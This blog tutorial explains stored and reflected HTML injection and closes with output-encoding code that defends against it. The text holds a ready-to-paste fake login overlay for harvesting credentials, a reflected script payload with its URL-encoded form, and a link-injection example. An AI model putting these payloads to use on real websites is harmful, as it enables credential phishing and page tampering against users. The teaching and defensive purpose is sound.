Saturday, 18 July 2020

Background concept of HTML Injection

Let's talk about HTML injection. HTML injection is a type of issue that occurs when a user is able to control an input point and can inject arbitrary HTML code into a vulnerable web page.


HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized or the output is not encoded, so that an attacker is able to inject valid HTML code into a vulnerable web page. Many techniques use elements and attributes to submit HTML content.

If these methods are provided with untrusted input, there is a high risk of XSS, specifically of the HTML injection kind. If strings are not correctly sanitized, the problem could lead to XSS-based HTML injection.

This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

Basically, you have to find an input parameter, either GET-based or POST-based. If your input is reflected back to you, HTML code can be executed there, and if you succeed in getting any HTML code rendered on the web page, there is an HTMLi (HTML injection).

There are two types of HTML injection, as follows:

    Stored HTML
    Reflected HTML

Stored HTML

Stored HTML injection is also known as persistent, because through this vulnerability the injected malicious script is permanently stored on the web server and the application server gives it back to the user when he visits the respective website. Hence, when the client clicks on the payload, which appears as an official part of the website, the injected HTML code is executed by the browser. The most common example is the comment option on blogs, which allows users to POST their comments for the administrator or another user.

An example is a web application vulnerable to stored HTML injection that allows users to submit their entries in the blog, as shown in the screenshot.

First, user “bee”, acting as the attacker, makes a normal entry, which is successfully added to the web server database.

Enter the following HTML code in the given text area to make the HTML attack.

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action=""><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

The HTML code above overlays a fake user login form on the targeted web page; in the attack described, the submitted credentials are forwarded to the attacker’s IP.

As you can see below, the login page looks valid to the user and is stored on the web server.

Now when the victim opens the malicious login page, he receives the above web page, which looks official to him, and submits his credentials on that page. When he does so, the request is forwarded to the attacker's IP address.


Reflected HTML

Reflected HTML injection, also known as non-persistent, occurs when the web application responds immediately to the user’s input without validating it. This lets an attacker inject browser-executable code inside the single HTML response. It is named “non-persistent” since the malicious script is not stored on the web server; therefore the attacker sends the malicious link through phishing to trap the user.

The most common place for this kind of vulnerability is the search function of a website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page returns the result of these HTML entities.

Payload value: "><script>alert(1)</script>

After injecting the payload (if the website is not vulnerable):

Encoded value: %22%3E%3Cscript%3Ealert(1)%3C/script%3E

The following web page allows a user to submit his first and last name, but these text fields are vulnerable to HTML injection.

Now type HTML code in the first name text field that creates a link to hackingtruth.in when you click on “Kumar Atul”:

<h1><a href ="http://www.hackingtruth.in">Kumar Atul</a></h1>

Similarly type following code in the given text field for the last name:

Click on the Go tab to execute this as first and last name.

From the given screenshot, you can see it has submitted KumarAtul Jaiswal, and the word “Kumar Atul” contains a link to hackingtruth.in; when you click on the link, it forwards you to hackingtruth.in.
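The stored and reflected cases above both come down to untrusted input being written into the response as markup. The following is an added example, not code from the original post or from any real application: it shows a vulnerable template next to the same template with output encoding. All function names and page templates are assumptions, and the inputs are constructed from the strings shown in this post.

```javascript
// Added example: output encoding for the stored and reflected cases.
// Function names and templates are hypothetical, not from a real application.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that let text break out of an HTML text node
// or out of a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user input is concatenated into the response as markup.
function renderWelcomeVulnerable(first, last) {
  return `<p>Welcome ${first} ${last}</p>`;
}

// Hardened: the same template, with every untrusted value encoded on output.
function renderWelcomeSafe(first, last) {
  return `<p>Welcome ${escapeHtml(first)} ${escapeHtml(last)}</p>`;
}

// Stored case: entries read back from the database are encoded when rendered,
// so anything saved earlier is still displayed as plain text.
function renderBlogEntries(entries) {
  return entries
    .map((e) => `<tr><td>${escapeHtml(e.owner)}</td><td>${escapeHtml(e.entry)}</td></tr>`)
    .join('\n');
}

// Reflected case inside an attribute: the search term is echoed into value="...".
function renderSearchBox(term) {
  return `<input type="text" name="q" value="${escapeHtml(term)}">`;
}

// Constructed sample input based on the strings shown in the post.
const firstName = '<h1><a href ="http://www.hackingtruth.in">Kumar Atul</a></h1>';
const searchTerm = decodeURIComponent('%22%3E%3Cscript%3Ealert(1)%3C/script%3E');

console.log(renderWelcomeVulnerable(firstName, 'Jaiswal')); // link is rendered as markup
console.log(renderWelcomeSafe(firstName, 'Jaiswal'));       // markup is shown as text
console.log(renderSearchBox(searchTerm));                   // quote cannot close the attribute
console.log(renderBlogEntries([{ owner: 'bee', entry: '<form name="login" action="">' }]));
```

Encoding is applied at output time, per context, so entries that were stored before the fix are also rendered as text.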

Let's talk about the impact of HTMLi:

1) It can allow an attacker to modify the page.

2) DOM content can be loaded there.

Basically, any HTML form can be executed there.

Any HTML redirection method can be executed there, DOM content can be loaded onto the web page, or a fake login page can be used to hijack user sessions or user credentials. Those are the possibilities of HTML injection.


- Hacking Truth by Kumar Atul Jaiswal
